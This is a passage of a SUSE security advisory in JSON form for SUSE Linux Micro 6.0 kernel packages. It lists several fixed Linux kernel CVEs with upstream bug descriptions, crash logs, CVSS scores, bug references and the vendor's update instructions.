"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40264",
"url": "https://www.suse.com/security/cve/CVE-2025-40264"
},
{
"category": "external",
"summary": "SUSE Bug 1254835 for CVE-2025-40264",
"url": "https://bugzilla.suse.com/1254835"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40264"
},
{
"cve": "CVE-2025-40268",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40268"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncifs: client: fix memory leak in smb3_fs_context_parse_param\n\nThe user calls fsconfig twice, but when the program exits, free() only\nfrees ctx-\u003esource for the second fsconfig, not the first.\nRegarding fc-\u003esource, there is no code in the fs context related to its\nmemory reclamation.\n\nTo fix this memory leak, release the source memory corresponding to ctx\nor fc before each parsing.\n\nsyzbot reported:\nBUG: memory leak\nunreferenced object 0xffff888128afa360 (size 96):\n backtrace (crc 79c9c7ba):\n kstrdup+0x3c/0x80 mm/util.c:84\n smb3_fs_context_parse_param+0x229b/0x36c0 fs/smb/client/fs_context.c:1444\n\nBUG: memory leak\nunreferenced object 0xffff888112c7d900 (size 96):\n backtrace (crc 79c9c7ba):\n smb3_fs_context_fullpath+0x70/0x1b0 fs/smb/client/fs_context.c:629\n smb3_fs_context_parse_param+0x2266/0x36c0 fs/smb/client/fs_context.c:1438",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40268",
"url": "https://www.suse.com/security/cve/CVE-2025-40268"
},
{
"category": "external",
"summary": "SUSE Bug 1255082 for CVE-2025-40268",
"url": "https://bugzilla.suse.com/1255082"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40268"
},
{
"cve": "CVE-2025-40269",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40269"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: usb-audio: Fix potential overflow of PCM transfer buffer\n\nThe PCM stream data in USB-audio driver is transferred over USB URB\npacket buffers, and each packet size is determined dynamically. The\npacket sizes are limited by some factors such as wMaxPacketSize USB\ndescriptor. OTOH, in the current code, the actually used packet sizes\nare determined only by the rate and the PPS, which may be bigger than\nthe size limit above. This results in a buffer overflow, as reported\nby syzbot.\n\nBasically when the limit is smaller than the calculated packet size,\nit implies that something is wrong, most likely a weird USB\ndescriptor. So the best option would be just to return an error at\nthe parameter setup time before doing any further operations.\n\nThis patch introduces such a sanity check, and returns -EINVAL when\nthe packet size is greater than maxpacksize. The comparison with\nep-\u003epacksize[1] alone should suffice since it\u0027s always equal or\ngreater than ep-\u003epacksize[0].",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40269",
"url": "https://www.suse.com/security/cve/CVE-2025-40269"
},
{
"category": "external",
"summary": "SUSE Bug 1255035 for CVE-2025-40269",
"url": "https://bugzilla.suse.com/1255035"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40269"
},
{
"cve": "CVE-2025-40271",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40271"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfs/proc: fix uaf in proc_readdir_de()\n\nPde is erased from subdir rbtree through rb_erase(), but not set the node\nto EMPTY, which may result in uaf access. We should use RB_CLEAR_NODE()\nset the erased node to EMPTY, then pde_subdir_next() will return NULL to\navoid uaf access.\n\nWe found an uaf issue while using stress-ng testing, need to run testcase\ngetdent and tun in the same time. The steps of the issue is as follows:\n\n1) use getdent to traverse dir /proc/pid/net/dev_snmp6/, and current\n pde is tun3;\n\n2) in the [time windows] unregister netdevice tun3 and tun2, and erase\n them from rbtree. erase tun3 first, and then erase tun2. the\n pde(tun2) will be released to slab;\n\n3) continue to getdent process, then pde_subdir_next() will return\n pde(tun2) which is released, it will case uaf access.\n\nCPU 0 | CPU 1\n-------------------------------------------------------------------------\ntraverse dir /proc/pid/net/dev_snmp6/ | unregister_netdevice(tun-\u003edev) //tun3 tun2\nsys_getdents64() |\n iterate_dir() |\n proc_readdir() |\n proc_readdir_de() | snmp6_unregister_dev()\n pde_get(de); | proc_remove()\n read_unlock(\u0026proc_subdir_lock); | remove_proc_subtree()\n | write_lock(\u0026proc_subdir_lock);\n [time window] | rb_erase(\u0026root-\u003esubdir_node, \u0026parent-\u003esubdir);\n | write_unlock(\u0026proc_subdir_lock);\n read_lock(\u0026proc_subdir_lock); |\n next = pde_subdir_next(de); |\n pde_put(de); |\n de = next; //UAF |\n\nrbtree of dev_snmp6\n |\n pde(tun3)\n / \\\n NULL pde(tun2)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40271",
"url": "https://www.suse.com/security/cve/CVE-2025-40271"
},
{
"category": "external",
"summary": "SUSE Bug 1255297 for CVE-2025-40271",
"url": "https://bugzilla.suse.com/1255297"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.2,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40271"
},
{
"cve": "CVE-2025-40272",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40272"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmm/secretmem: fix use-after-free race in fault handler\n\nWhen a page fault occurs in a secret memory file created with\n`memfd_secret(2)`, the kernel will allocate a new folio for it, mark the\nunderlying page as not-present in the direct map, and add it to the file\nmapping.\n\nIf two tasks cause a fault in the same page concurrently, both could end\nup allocating a folio and removing the page from the direct map, but only\none would succeed in adding the folio to the file mapping. The task that\nfailed undoes the effects of its attempt by (a) freeing the folio again\nand (b) putting the page back into the direct map. However, by doing\nthese two operations in this order, the page becomes available to the\nallocator again before it is placed back in the direct mapping.\n\nIf another task attempts to allocate the page between (a) and (b), and the\nkernel tries to access it via the direct map, it would result in a\nsupervisor not-present page fault.\n\nFix the ordering to restore the direct map before the folio is freed.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40272",
"url": "https://www.suse.com/security/cve/CVE-2025-40272"
},
{
"category": "external",
"summary": "SUSE Bug 1254832 for CVE-2025-40272",
"url": "https://bugzilla.suse.com/1254832"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40272"
},
{
"cve": "CVE-2025-40273",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40273"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nNFSD: free copynotify stateid in nfs4_free_ol_stateid()\n\nTypically copynotify stateid is freed either when parent\u0027s stateid\nis being close/freed or in nfsd4_laundromat if the stateid hasn\u0027t\nbeen used in a lease period.\n\nHowever, in case when the server got an OPEN (which created\na parent stateid), followed by a COPY_NOTIFY using that stateid,\nfollowed by a client reboot. New client instance while doing\nCREATE_SESSION would force expire previous state of this client.\nIt leads to the open state being freed thru release_openowner-\u003e\nnfs4_free_ol_stateid() and it finds that it still has copynotify\nstateid associated with it. We currently print a warning and is\ntriggerred\n\nWARNING: CPU: 1 PID: 8858 at fs/nfsd/nfs4state.c:1550 nfs4_free_ol_stateid+0xb0/0x100 [nfsd]\n\nThis patch, instead, frees the associated copynotify stateid here.\n\nIf the parent stateid is freed (without freeing the copynotify\nstateids associated with it), it leads to the list corruption\nwhen laundromat ends up freeing the copynotify state later.\n\n[ 1626.839430] Internal error: Oops - BUG: 00000000f2000800 [#1] SMP\n[ 1626.842828] Modules linked in: nfnetlink_queue nfnetlink_log bluetooth cfg80211 rpcrdma rdma_cm iw_cm ib_cm ib_core nfsd nfs_acl lockd grace nfs_localio ext4 crc16 mbcache jbd2 overlay uinput snd_seq_dummy snd_hrtimer qrtr rfkill vfat fat uvcvideo snd_hda_codec_generic videobuf2_vmalloc videobuf2_memops snd_hda_intel uvc snd_intel_dspcfg videobuf2_v4l2 videobuf2_common snd_hda_codec snd_hda_core videodev snd_hwdep snd_seq mc snd_seq_device snd_pcm snd_timer snd soundcore sg loop auth_rpcgss vsock_loopback vmw_vsock_virtio_transport_common vmw_vsock_vmci_transport vmw_vmci vsock xfs 8021q garp stp llc mrp nvme ghash_ce e1000e nvme_core sr_mod nvme_keyring nvme_auth cdrom vmwgfx drm_ttm_helper ttm sunrpc dm_mirror dm_region_hash dm_log iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi fuse dm_multipath dm_mod nfnetlink\n[ 1626.855594] CPU: 2 UID: 0 PID: 199 Comm: kworker/u24:33 Kdump: loaded Tainted: G B W 6.17.0-rc7+ #22 PREEMPT(voluntary)\n[ 1626.857075] Tainted: [B]=BAD_PAGE, [W]=WARN\n[ 1626.857573] Hardware name: VMware, Inc. VMware20,1/VBSA, BIOS VMW201.00V.24006586.BA64.2406042154 06/04/2024\n[ 1626.858724] Workqueue: nfsd4 laundromat_main [nfsd]\n[ 1626.859304] pstate: 61400005 (nZCv daif +PAN -UAO -TCO +DIT -SSBS BTYPE=--)\n[ 1626.860010] pc : __list_del_entry_valid_or_report+0x148/0x200\n[ 1626.860601] lr : __list_del_entry_valid_or_report+0x148/0x200\n[ 1626.861182] sp : ffff8000881d7a40\n[ 1626.861521] x29: ffff8000881d7a40 x28: 0000000000000018 x27: ffff0000c2a98200\n[ 1626.862260] x26: 0000000000000600 x25: 0000000000000000 x24: ffff8000881d7b20\n[ 1626.862986] x23: ffff0000c2a981e8 x22: 1fffe00012410e7d x21: ffff0000920873e8\n[ 1626.863701] x20: ffff0000920873e8 x19: ffff000086f22998 x18: 0000000000000000\n[ 1626.864421] x17: 20747562202c3839 x16: 3932326636383030 x15: 3030666666662065\n[ 1626.865092] x14: 6220646c756f6873 x13: 0000000000000001 x12: ffff60004fd9e4a3\n[ 1626.865713] x11: 1fffe0004fd9e4a2 x10: ffff60004fd9e4a2 x9 : dfff800000000000\n[ 1626.866320] x8 : 00009fffb0261b5e x7 : ffff00027ecf2513 x6 : 0000000000000001\n[ 1626.866938] x5 : ffff00027ecf2510 x4 : ffff60004fd9e4a3 x3 : 0000000000000000\n[ 1626.867553] x2 : 0000000000000000 x1 : ffff000096069640 x0 : 000000000000006d\n[ 1626.868167] Call trace:\n[ 1626.868382] __list_del_entry_valid_or_report+0x148/0x200 (P)\n[ 1626.868876] _free_cpntf_state_locked+0xd0/0x268 [nfsd]\n[ 1626.869368] nfs4_laundromat+0x6f8/0x1058 [nfsd]\n[ 1626.869813] laundromat_main+0x24/0x60 [nfsd]\n[ 1626.870231] process_one_work+0x584/0x1050\n[ 1626.870595] worker_thread+0x4c4/0xc60\n[ 1626.870893] kthread+0x2f8/0x398\n[ 1626.871146] ret_from_fork+0x10/0x20\n[ 1626.871422] Code: aa1303e1 aa1403e3 910e8000 97bc55d7 (d4210000)\n[ 1626.871892] SMP: stopping secondary CPUs",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40273",
"url": "https://www.suse.com/security/cve/CVE-2025-40273"
},
{
"category": "external",
"summary": "SUSE Bug 1254828 for CVE-2025-40273",
"url": "https://bugzilla.suse.com/1254828"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40273"
},
{
"cve": "CVE-2025-40274",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40274"
}
],
"notes": [
{
"category": "general",
